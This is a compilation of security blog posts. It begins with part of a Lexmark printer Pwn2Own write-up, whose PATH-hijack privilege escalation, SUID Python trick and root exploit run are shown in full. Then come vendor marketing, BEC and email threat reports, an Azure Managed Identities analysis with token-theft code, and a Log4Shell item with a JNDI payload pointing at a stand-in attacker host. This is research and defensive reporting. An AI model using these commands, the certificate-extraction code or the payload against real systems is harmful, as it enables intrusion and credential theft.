Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-selogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect-selogs-wrapper SUID binary again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., the setup wizard has been completed) or is password-less (i.e., the authentication reset was already executed earlier or the setup wizard has not yet been completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM',        
    'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.


Three Keys to Modern Cyberdefense: Affordability, Availability, Efficacy

Choosing a cybersecurity vendor can feel like a never-ending series of compromises. But with SonicWall’s portfolio of high-quality solutions — available at industry-leading TCOs and in stock — it doesn’t have to.


If you’ve ever been to a small-town mechanic, chances are you’ve seen the sign: “We offer three types of service here — Good, Fast and Cheap. Pick any two!”

In cybersecurity, this can be framed as “Affordability, Availability and Efficacy,” but the idea is the same — when making your choice, something’s got to give.

The effects of this mentality are sending ripples across the cybersecurity industry. At the recent 2022 RSA Conference, Joe Hubback of cyber risk management firm ISTARI explained that based on his survey, a full 90% of CISOs, CIOs, government organizations and more reported they aren’t getting the efficacy promised by vendors.

Several reasons for this were discussed, but most came back to this idea of compromise — buyers want products now, and they’re facing budget constraints. So, they often believe the vendors’ claims (which tend to be exaggerated). With little actual evidence or confirmation for these claims available, and little time to evaluate these solutions for themselves, customers are left disappointed.

To make the buying process more transparent and objective, Hubback says, vendor solutions should be evaluated in terms of Capability, Practicality, Quality and Provenance. While his presentation didn’t reference the Affordability-Availability-Efficacy trifecta directly, these ideas are interconnected — and regardless of whether you use either metric or both, SonicWall comes out ahead.

Availability: Supply-Chain Constraints and Lack of Inventory

Order and install times have always been a consideration. But the current climate has led to a paradox in modern cybersecurity: With cyberattack surfaces widening and cybercrime rising, you really ought to have upgraded yesterday. But in many cases, the components you need won’t be in stock for several months.

While many customers are being locked into high-dollar contracts and then being forced to wait for inventory, this isn’t true for SonicWall customers: Our supply chain is fully operational and ready to safeguard your organization.

SonicWall is currently fulfilling 95% of orders within three days.

Procurement Planning & Forecasting

“We’re hearing more often than not that our competitors don’t have the product on the shelf, but we’ve been managing this for nearly two years,” SonicWall Executive Vice President of Operations Yew-Joo Hoe said.

In autumn of 2020, as lead times began to creep up, SonicWall’s operations department immediately began altering internal processes, changing the way it works with suppliers and ships goods, and even re-engineering some products to deliver the same performance with more readily available components.

So now, even amid remarkable growth — 2021 saw a 33% increase in new customer growth, along with a 45% rise in new customer sales — SonicWall is currently fulfilling 95% of orders within three days.

But even as we’ve zeroed in on supply-chain continuity, our dedication to the Provenance of our supply chain has been unwavering. We aim to secure, connect and mobilize organizations operating within approved or authorized regions, territories and countries by ensuring the integrity of our supply chain from start to finish.

SonicWall products are also compliant with the Trade Agreements Act in the U.S., and our practices help ensure SonicWall products aren’t compromised by third parties during the manufacturing process.

Affordability: The Two Facets of TCO

SonicWall’s goal is to deliver industry-leading TCO. But this is more than a marketing message for us — we put it to the test.

SonicWall recently commissioned the Tolly Group to evaluate the SonicWall NSsp 13700, the NSsp 15700, the NSa 2700 and more against equivalent competitor products. Each time, the SonicWall product was named the better value, saving customers thousands, tens of thousands and even hundreds of thousands while delivering superior threat protection.

But we also recognize that the measure of a product’s affordability extends beyond the number on an order sheet, to how much labor that solution requires. Hubback summarized the idea of Practicality as “Is this actually something I can use in my company without needing some kind of Top Gun pilot to fly it and make it work?” With cybersecurity professionals getting harder to find, and their experience becoming more expensive every day, the ideas of Practicality and Affordability have never been so intertwined.

Fortunately, SonicWall has long recognized this association, and we’ve built our products to reduce both the amount of human intervention and the required skill level needed to run our solutions.

Innovations such as Zero-Touch Deployment, cloud-based management, single-pane-of-glass interfaces, simplified policy creation and management, and one-click rollback in the event of a breach have brought increased simplicity to our portfolio without sacrificing performance or flexibility.

Efficacy: How It’s Built and How It Performs

Hubback’s final two criteria, Quality and Capability, describe how well a solution is built, and how well it can do what it promises. Taken together, these form the core of what we think of as Efficacy.

While Quality is the most enigmatic of Hubback’s criteria, it can be reasonably ascertained based on a handful of factors, such as longevity, customer satisfaction and growth.

With over 30 years of experience, SonicWall is a veteran cybersecurity leader trusted by SMBs, enterprises and government agencies around the globe. In the crowded cybersecurity market, this sort of longevity isn’t possible without quality offerings — and our quantity of repeat purchasers and scores of customer case studies attest to the high standards we maintain for every solution we build.

In contrast, Capability can be very easy to judge — if a vendor chooses to put its products to the test. Independent, third-party evaluation is the gold standard for determining whether products live up to their promises. And based on this metric, SonicWall comes out on top.

To provide customers objective information about its performance, SonicWall Capture ATP with RTDMI has been evaluated by third-party testing firm ICSA Labs, an independent division of Verizon. For the past five consecutive quarters, the solution has found 100% of the threats without issuing a single false positive. SonicWall has now earned more perfect scores — and more back-to-back perfect scores — than any other active vendor.

Today, thousands of organizations will shop for new or upgraded cybersecurity solutions. While they may differ in size, industry, use case and more, at the end of the day, they’re all looking for basically the same thing: A reliable solution that performs as advertised, at a price that fits within their budget, that can be up and running as soon as possible.

There will always be those who tell you that you can’t have everything; that the center of this Venn diagram will always be empty. But at SonicWall, we refuse to compromise — and we think you should, too.

Source :
https://blog.sonicwall.com/en-us/2022/06/three-keys-to-modern-cyberdefense-affordability-availability-efficacy/

BEC Attacks: Can You Stop the Imposters in Your Inbox?

BEC attacks are a $1.8 billion racket — and statistically, your business will be targeted sooner rather than later. Watch this webinar to learn how to stop them.

If asked which of the threat types tracked by the FBI causes the most financial damage, most people would say ransomware.

They’d be wrong.

In 2021, the FBI’s Internet Crime Complaint Center (IC3) received 19,954 Business Email Compromise (BEC) reports, with adjusted losses totaling almost $2.4 billion. That’s an average of more than $120,270 per incident, compared with just under $13,200 per incident for ransomware attacks.

Since the FBI began tracking these threats in 2013, tens of billions in financial losses have been recorded, resulting from nearly 170,000 incidents in 178 countries.

So why hasn’t this threat risen to the notoriety of ransomware?

During many ransomware attacks, business operations grind to a halt. When a company loses access to customer information, payment systems and mission-critical applications, it often becomes clear in short order that something is wrong.

But BEC attacks are comparatively silent. Even when these attacks have a huge impact on an organization’s bottom line, operations can generally continue as usual. As a result, businesses frequently opt to keep these attacks out of the public eye to avoid risking reputation damage and loss of trust.

But although ransomware still dominates security news, the growing frequency, volume and cost of BEC attacks have begun attracting more attention.

As a result, BEC attacks have become a top threat concern for many organizations today, according to a recent SonicWall-sponsored white paper by Osterman Research. “How to Deal with Business Email Compromise” reports primary research data from an in-depth customer survey of 119 respondents, each of which has direct knowledge of how their organization is addressing or planning to address the risk of BEC.

The results from this study offer a look at how security influencers and decision-makers are taking BEC into account when formulating their spending plans for the next 12 months. For example, while just 46% of organizations said they considered protecting against BEC attacks “important” or “extremely important” 12 months ago, 76% said they considered it important or extremely important today.


80%

Organizations indicating that protecting against BEC attacks in 2023 is of high importance

The data also shows that three-fifths of organizations in the study view protecting against BEC attacks as one of their top five security priorities.

62%

Organizations ranking protecting against BEC attacks as one of their top five priorities.

How BEC Attacks Fly Under the Radar

But what makes BEC attacks so dangerous when compared with other forms of cyberattacks? And why are they harder to stop?

BEC is a specialized type of phishing attack that relies on social engineering. Attackers often use a proven pretexting technique to engineer a quick introduction and establish a believable scenario in order to manipulate the victim into taking a specific action.

While these attacks can target employees at any level of an organization, they generally start with an attacker impersonating a person with authority, such as a CEO or CFO, a manager, or a supplier. The attacker uses the authority figure’s identity to start a chain of plausible (but fake) requests to gain monetary payment. This typically involves instructing someone in accounts payable, someone in HR or even someone with a company credit card to pay a fake invoice, transfer funds, send gift cards or make payroll payouts. The urgent tone of these messages encourages the victim to respond or act quickly, bypassing any checks and balances that may be in place.

Compared with other forms of cyberattacks, BEC attacks are among the hardest to detect because the threat signals are far less obvious. Relying on trickery and impersonation, the approach is very subtle, and the actual delivery generally doesn’t use weaponized URLs or malicious attachments, which are easily detected.

In addition, the email content and the delivery mechanism are usually of higher quality and often tailored to target a specific person or persons. With little to no apparent sign of a threat, these messages can bypass most email security filters to reach the inbox — and the absence of any sort of alert, such as a contextual warning advising them to exercise caution, leaves the victim more vulnerable to falling for the scam.

Because so many of these scams succeed, their use has grown dramatically: today, roughly 80% of companies are targeted by BEC attacks each year. While there isn’t much you can do to avoid being targeted, there’s plenty you can do to safeguard your organization’s finances. To learn more about BEC attacks and how to stop them, check out our webinar, “Can You Stop the Imposters in Your Inbox?”

Source :
https://blog.sonicwall.com/en-us/2022/06/bec-attacks-can-you-stop-the-imposters-in-your-inbox/

An Analysis of Azure Managed Identities Within Serverless Environments

We examine Azure’s Managed Identities service, developers’ go-to feature for managing secrets and credentials, and assess its security capabilities within a threat model.

Authentication and authorization play crucial parts when securing resources. Authentication verifies that the service or user accessing the secured resources has provided valid credentials, while authorization makes sure that they have sufficient permissions for the request itself.

Broken Access Control is listed among the OWASP Top 10 most prevalent web application issues for both 2017 and 2021, and we have previously written about the importance of secrets management for authentication. Broken access control occurs when a user can access, modify, delete, or perform actions within an application or system outside the set permissions or policies, whether maliciously or unintentionally. It has risen to the top of the OWASP list, and in this article we discuss how Azure’s Managed Identities service can be used inside the cloud service provider (CSP) to tackle this class of issue.

Managing system and user identities

Managed Identities for Azure allows users to authenticate to certain services available within the CSP. This is done by providing the cloud application a token used for service authentication. We distinguish between two types of managed identities: system-assigned and user-assigned. A system-assigned identity is tied one-to-one to the resource it belongs to, which means different roles can’t be applied to that same resource. User-assigned identities solve this problem; we can think of them as reusable roles that can be attached to multiple resources.
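As a quick illustration of the distinction, here is a minimal Python sketch using the azure-identity library; the client ID is a placeholder for a user-assigned identity’s ID:

```python
from azure.identity import ManagedIdentityCredential

# System-assigned identity: tied one-to-one to the hosting resource,
# so no identifier is needed.
system_credential = ManagedIdentityCredential()

# User-assigned identity: reusable across resources and selected by
# its client ID (the GUID below is a placeholder).
user_credential = ManagedIdentityCredential(
    client_id="00000000-0000-0000-0000-000000000000"
)

# Either credential can request a token for a target service scope,
# e.g., Azure Storage.
token = system_credential.get_token("https://storage.azure.com/.default")
print(token.expires_on)
```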

Figure 1. Usage of Managed Identities


For instance, suppose we want to use an Azure storage account within a serverless application for saving application records, and for this purpose we decide to use a system-assigned identity.

This practically means:

  • Enable managed identities inside a serverless function
  • Grant serverless functions the necessary permissions for storage account access

Figure 2. Enabling managed identities in a serverless function


After that, we can start using the managed identity for authentication to the storage account. In the following sections, we will look at how the managed identities interface is technically implemented within the serverless environment and the corresponding security implications based on our recent research.
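A minimal sketch of that usage in Python, assuming the azure-identity and azure-storage-blob packages, a placeholder storage account name, and a suitable role assignment (e.g., Storage Blob Data Contributor):

```python
from azure.identity import ManagedIdentityCredential
from azure.storage.blob import BlobServiceClient

# Authenticate to the storage account with the function's
# system-assigned managed identity; no secrets in code or config.
credential = ManagedIdentityCredential()
client = BlobServiceClient(
    account_url="https://<storage-account>.blob.core.windows.net",  # placeholder
    credential=credential,
)

# Save an application record; assumes a "records" container exists and
# the identity holds a data role such as Storage Blob Data Contributor.
blob = client.get_blob_client(container="records", blob="record-001.json")
blob.upload_blob(b'{"status": "ok"}', overwrite=True)
```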

Managing identities in the serverless environment

To make this work, the serverless environment runs a special .NET application process named “dotnet TokenServiceContainer.dll.” This process listens on localhost port 8081 and accepts HTTP requests. The endpoint for requesting a token is http://localhost:8081/msi/token, and the required parameters specify the API version used and the resource identifier for which the token is requested. An optional “client_id” parameter is used when a token for a user-assigned managed identity is requested. The request also needs a specific X-IDENTITY-HEADER header, whose value is present in the IDENTITY_HEADER or MSI_SECRET environment variable.
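Put together, a token request from inside the function’s container might look like the following Python sketch; the API version string is an assumption, and the header value is read from the environment as described:

```python
import os

import requests

# Local token service endpoint described above.
TOKEN_ENDPOINT = "http://localhost:8081/msi/token"

params = {
    "api-version": "2019-08-01",               # assumed version string
    "resource": "https://storage.azure.com/",  # service the token is for
    # "client_id": "<guid>",  # only when using a user-assigned identity
}
headers = {
    # Secret header value the platform injects into the environment.
    "X-IDENTITY-HEADER": os.environ.get("IDENTITY_HEADER")
    or os.environ["MSI_SECRET"],
}

response = requests.get(TOKEN_ENDPOINT, params=params, headers=headers)
response.raise_for_status()
print(response.json()["access_token"])
```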

After receiving the token request, the process delegates it to an endpoint within the CSP (another service) that provides the requested token. This endpoint is publicly available and is part of the *.identity.azure.net subdomain corresponding to the region of the serverless application. Because the endpoint is publicly accessible, the service requires authentication by design, which is done using an X.509 client certificate. This certificate is unique to the specific application ID (meaning the serverless function has a one-to-one pairing of certificate and app ID) and is valid for 180 days. If the request is successful, it returns a JSON response with a bearer token valid for one day.
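For illustration only, a sketch of what that certificate-authenticated request could look like; the host, path, and query parameter are placeholders (only the *.identity.azure.net pattern is public), and the certificate is assumed to have been exported to PEM files:

```python
import requests

# Placeholders: only the *.identity.azure.net pattern is public; the
# actual host and path depend on the application's region and ID.
TOKEN_URL = "https://<region>.identity.azure.net/<token-path>"

response = requests.get(
    TOKEN_URL,
    params={"resource": "https://storage.azure.com/"},  # assumed parameter
    # X.509 client certificate authentication: requests presents the
    # certificate and key during the TLS handshake.
    cert=("msi-cert.pem", "msi-key.pem"),
)
response.raise_for_status()
# Expected result: a JSON response with a bearer token valid for one day.
print(response.json())
```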

Figure 3. Managed identities inside serverless environments


From that perspective, the security standard is high, as expected of a CSP service. However, there is one hidden danger: the certificate itself, which can be exposed if environment variables are leaked.

The Managed Service Identity (MSI) certificate is part of the encrypted container context, which can be fetched from the URL specified in CONTAINER_START_CONTEXT_SAS_URI and decrypted using the CONTAINER_ENCRYPTION_KEY variable. Once the certificate is leaked, it can be used to obtain the token outside the scope of CSP services, since the publicly available service endpoint accepts such a request as if it came from the CSP service itself.
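A heavily hedged sketch of how a leaked context might be recovered; the framing of the encrypted payload (base64-encoded AES-CBC ciphertext with a prepended IV) is an assumption made for illustration, not a documented format:

```python
import base64
import os

import requests
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Fetch the encrypted container context from the SAS URL.
encrypted_context = requests.get(
    os.environ["CONTAINER_START_CONTEXT_SAS_URI"]
).content

# ASSUMPTION: base64-encoded AES-CBC ciphertext with a 16-byte IV
# prepended. The real framing is not documented and may differ.
key = base64.b64decode(os.environ["CONTAINER_ENCRYPTION_KEY"])
blob = base64.b64decode(encrypted_context)
iv, ciphertext = blob[:16], blob[16:]

decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
context = decryptor.update(ciphertext) + decryptor.finalize()

# The decrypted context is what would contain the MSI client
# certificate described above.
print(context[:200])
```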

Threat model and scenario

Figure 4. PoC of obtaining a token using environment variables leaked from the Managed Identity service


At this point, we should emphasize that to abuse the obtained token, a malicious actor must first leak these environment variables, and a role must be assigned within the requested resource; the prerequisites are that managed identities are enabled and that a role has been set for the application. There are no default roles unless explicitly specified within the CSP settings.

However, as this example of a potential compromise through leaked environment variables on a Linux endpoint shows, storing sensitive information in environment variables is not a secure approach, as they are inherited by child processes by default. Because the certificate, along with all the information needed to use it, is available inside the environment itself, the endpoint for getting the token effectively becomes publicly usable: a threat actor can obtain the authentication token from outside the CSP’s service and gain all the permissions of the original identity.

In this example, the token provider service within the serverless environment runs under a different user. Why, then, is the client certificate not restricted to that user, stored as a file readable only by that user? As things stand, a compromised serverless function can leak the certificate and obtain the access token from the external service. And while the unauthorized user can’t gain privileges beyond what the function already has, this is enough to conduct activities inside the environment that can have a range of damaging effects. By moving the client certificate into the security boundary of the token service user and setting its access permissions to read-only for that user, we would guarantee that even in case of a compromise, the client certificate could not be leaked and used outside the CSP service without additional lateral movement.
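A minimal sketch of that hardening on a Linux host, with a hypothetical certificate path and token-service user name:

```python
import os
import pwd

# Hypothetical path and user name, for illustration only.
CERT_PATH = "/var/token-service/msi-cert.pem"
TOKEN_SERVICE_USER = "tokensvc"

uid = pwd.getpwnam(TOKEN_SERVICE_USER).pw_uid

# Make the token service user the owner of the certificate file
# (group left unchanged), then restrict it to owner read-only (0400)
# so a compromised function running as another user cannot read it.
os.chown(CERT_PATH, uid, -1)
os.chmod(CERT_PATH, 0o400)
```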

A security chain is only as strong as its weakest link. And while CSP services are not inherently insecure, small design weaknesses combined with improper user configurations can lead to bigger, more damaging consequences. Design applications, environments, and all their related variables with security in mind. If possible, avoid storing sensitive information in environment variables. Following security best practices, such as applying the principle of least privilege, helps mitigate the consequences of a breach.

Source :
https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/an-analysis-of-azure-managed-identities-within-serverless-environments

Trend Micro Cloud App Security Threat Report 2021

In this report, we highlight the notable email threats of 2021, including over 33.6 million high-risk email threats (representing a 101% increase from 2020’s numbers) that we’ve detected using the Trend Micro Cloud App Security platform.

Email is an integral cog in the digital transformation machine. This was especially true in 2021, when organizations found themselves trying to keep business operations afloat in the middle of a pandemic that has forever changed how people work. At a time when the workplace had already largely shifted from offices to homes, malicious actors continued to favor email as a low-effort yet high-impact attack vector to disseminate malware.

Email is popular among cybercriminals not only for its simplicity but also for its efficacy. In fact, 74.1% of the total threats blocked by Trend Micro in 2021 were email threats. Meanwhile, the 2021 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3) states that there was “an unprecedented increase in cyberattacks and malicious cyber activity” last year, with business email compromise (BEC) being among the top incidents.

In this report, we discuss the notable email threats of 2021 based on the data that we’ve gathered using the Trend Micro™ Cloud App Security™, a security solution that supplements the preexisting security features in email and collaboration platforms.


Malware detections surge as attacks become more elaborate, targeted

The Trend Micro Cloud App Security solution detected and thwarted a total of 3,315,539 malware files in 2021. More alarmingly, this number represents a whopping 196% increase from 2020’s numbers. There were also huge spikes in both known and unknown malware detections in 2021, at 133.8% and 221%, respectively.

Cybercriminals worked overtime to attach malware in malicious emails in 2021 using advanced tactics and social engineering lures. In January, we saw how Emotet sent spam emails that used hexadecimal and octal representations of IP addresses for detection evasion in its delivery of malware such as TrickBot and Cobalt Strike.

In May last year, we reported on Panda Stealer, an information stealer that targets cryptocurrency wallets and credentials via spam emails. We also shared an update on APT-C-36 (aka Blind Eagle), an advanced persistent threat (APT) group targeting South American entities using a spam campaign that used fraudulent emails impersonating Colombia’s national directorate of taxes and customs and even fake infidelity email lures.

QAKBOT operators also resumed their spam campaign in late 2021 after an almost three-month hiatus and abused hijacked email threads to lead victims to both QAKBOT and the SquirrelWaffle malware loader.

Meanwhile, ransomware detections continued to decline in 2021, a consistent trend that we have been seeing in previous years. Last year, the Trend Micro Cloud App Security solution detected and blocked 101,215 ransomware files — a 43.4% decrease compared to 2020’s detections.

The reason behind this continuing decline is possibly twofold. One, unlike legacy ransomware that focuses on the quantity of victims, modern ransomware wages highly targeted and planned attacks to yield bigger profits. Since today’s ransomware actors no longer abide by the spray-and-pray model, the number of attacks is no longer as massive as what we witnessed in ransomware’s early days. We identified the other reason in our year-end roundup report: it’s possible that ransomware detections are down because our cybersecurity solutions continue to block an increasing number of ransomware affiliate tools each year, including TrickBot and BazarLoader, which could have prevented ransomware attacks from being successfully executed on victim environments.

Known, unknown, and overall credential phishing attacks rose in 2021

Based on Trend Micro Cloud App Security data, 6,299,883 credential phishing attacks were detected and blocked in 2021, a 15.2% increase overall. Similar to last year, the number of known credential phishing attacks is greater than that of unknown ones. However, this year, the percentage of increase is a staggering 72.8%.

When comparing 2020 and 2021’s numbers, we saw an 8.4% increase in detections of known credential phishing links and a 30% increase in detections of unknown credential phishing links.

Abnormal Security noted the increase in overall credential phishing attacks in a 2021 report, stating that credential phishing accounted for 73% of all the advanced threats they analyzed.

We have also documented the rise in credential phishing attacks over previous years. In fact, in the first half of 2019 alone, the Trend Micro Cloud App Security solution detected and blocked 2.4 million credential phishing attacks.

BEC’s small numbers bring big business losses

The Trend Micro Cloud App Security solution intercepted a total of 283,859 BEC attacks in 2021, a 10.61% decrease from 2020’s BEC detections. Interestingly, BEC attacks detected using Writing Style DNA increased by 82.7%, while attacks blocked by the antispam engine decreased by 38.59%.

Overall, BEC numbers have consistently been on a downward trend since 2020. But the reduction in BEC victims doesn’t equate to a dip in cybercriminal profits. According to the FBI’s IC3, BEC accounted for US$2.4 billion in adjusted losses for both businesses and consumers in 2021. According to the same organization, BEC losses have reached over US$43 billion between June 2016 and December 2021 for both domestic and international incidents.

We have also observed BEC actors continuously tweaking their tactics. In August last year, our telemetry showed a gradual increase in BEC detections. Upon investigation, we discovered that instead of impersonating company executives and upper management personnel, this BEC-related email campaign impersonated and targeted ordinary employees for money transfers and bank payroll account changes.

Covid-19 lures, cybercriminal campaigns behind massive jump in phishing numbers

The Trend Micro Cloud App Security solution data shows that a total of 16,451,166 phishing attacks were detected and blocked in 2021. This is a 137.6% growth from 2020’s phishing numbers.

In contrast to last year’s numbers, we saw a significant jump in phishing attacks detected via spam count this year: a whopping 596% increase, to be specific. Meanwhile, we observed a notable 15.26% increase in credential phishing count compared to last year.

These high numbers reflect organizations’ sentiments about phishing attacks. According to a survey in an Osterman Research report titled “How to Reduce the Risk of Phishing and Ransomware,” organizations were “concerned” or “extremely concerned” about phishing attempts making their way to end users and employees failing to spot phishing and social engineering attacks before accessing a link or attachment.

While the majority of Covid-19-related phishing emails and sites launched in 2020, cybercriminals continued to exploit the global pandemic for financial gain last year. Mexico-based medical laboratory El Chopo shared that a fraudulent website that looked identical to the company’s had been launched. On that website, users could schedule a vaccination appointment after paying MXN2,700 (approximately US$130). To make the fake website appear credible, the malicious actors behind it added fake contact information, such as email addresses and social media pages, that victims could use for inquiries.

Early last year, we reported on a wave of phishing emails that pretended to be coming from national postal systems. This campaign attempted to steal credit card numbers from 26 countries. We also investigated a spear-phishing campaign that used Pegasus spyware-related emails to lead victims into downloading a file stealer. This campaign targeted high-ranking political leaders, activists, and journalists in 11 countries.

Protect emails, endpoints, and cloud-based services and apps from attacks with Trend Micro Cloud App Security

Organizations should consider a comprehensive multilayered security solution such as Trend Micro Cloud App Security. It supplements the preexisting security features in email and collaboration platforms like Microsoft 365 and Google Workspace (formerly known as G Suite) by using machine learning (ML) to analyze and detect any suspicious content in the message body and attachments of an email. It also acts as a second layer of protection after emails and files have passed through Microsoft 365 or Gmail’s built-in security.

Trend Micro Cloud App Security uses technologies such as sandbox malware analysis, document exploit detection, and file, email, and web reputation technologies to detect malware hidden in Microsoft 365 or PDF documents. It provides data loss prevention (DLP) and advanced malware protection for Box, Dropbox, Google Drive, SharePoint Online, OneDrive for Business, and Salesforce while also enabling consistent DLP policies across multiple cloud-based applications. It also offers seamless integration with an organization’s existing cloud setup, preserving full user and administrator functionality, providing direct cloud-to-cloud integration through vendor APIs, and minimizing the need for additional resources by assessing threat risks before sandbox malware analysis.

Trend Micro Cloud App Security stands on the cutting edge of email and software-as-a-service (SaaS) security, offering ML-powered features that combat two of the primary email-based threats: BEC and credential phishing. Writing Style DNA can help determine if an email is legitimate by using ML to check a user’s writing style based on past emails and then comparing suspicious emails against it. Computer vision, on the other hand, combines image analysis and ML to check branded elements, login forms, and other site content. It then pools this information with site reputation elements and optical character recognition (OCR) to check for fake and malicious sites — all while reducing instances of false positives to detect credential phishing email.

This security solution also comes with an option to rescan historical URLs in users’ email metadata and perform continued remediation (automatically taking configured actions or restoring quarantined messages) using newer patterns updated by Web Reputation Services.

This is a significant option since users’ email metadata might include undetected suspicious or dangerous URLs that have only recently been discovered. The examination of such metadata is thus an important part of forensic investigations that help determine if your email service has been affected by attacks. This solution also officially supports the Time-of-Click Protection feature to protect Exchange Online users against potential risks when they access URLs in incoming email messages.

Trend Micro Cloud App Security also comes with the advanced and extended security capabilities of Trend Micro XDR, providing investigation, detection, and response across your endpoints, email, and servers.

Source :
https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/trend-micro-cloud-app-security-threat-report-2021

Log4Shell Still Being Exploited to Hack VMware Servers to Exfiltrate Sensitive Data

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.

“Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers,” the agencies said. “As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2).”

In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.

Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that’s used by a wide range of consumers and enterprise services, websites, applications, and other products.

Successful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.
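To make the mechanics concrete, here is a minimal sketch of how such a crafted string is typically delivered over HTTP; the hosts are placeholders, and this is for understanding the attack, not for probing systems you don’t own:

```python
import requests

# Placeholder hosts, for illustration only. Never probe systems you
# don't own or lack authorization to test.
TARGET = "https://vulnerable-horizon.example/"
PAYLOAD = "${jndi:ldap://attacker.example/a}"

# If a vulnerable Log4j version logs any of these header values, the
# JNDI lookup reaches out to the attacker's server, which can answer
# with a reference to attacker-controlled code.
response = requests.get(TARGET, headers={
    "User-Agent": PAYLOAD,
    "X-Api-Version": PAYLOAD,
})
print(response.status_code)
```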

Based on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed “hmsvc.exe” that’s equipped with capabilities to log keystrokes and deploy additional malware.

“The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network,” the agencies noted, adding it also offers a “graphical user interface (GUI) access over a target Windows system’s desktop.”

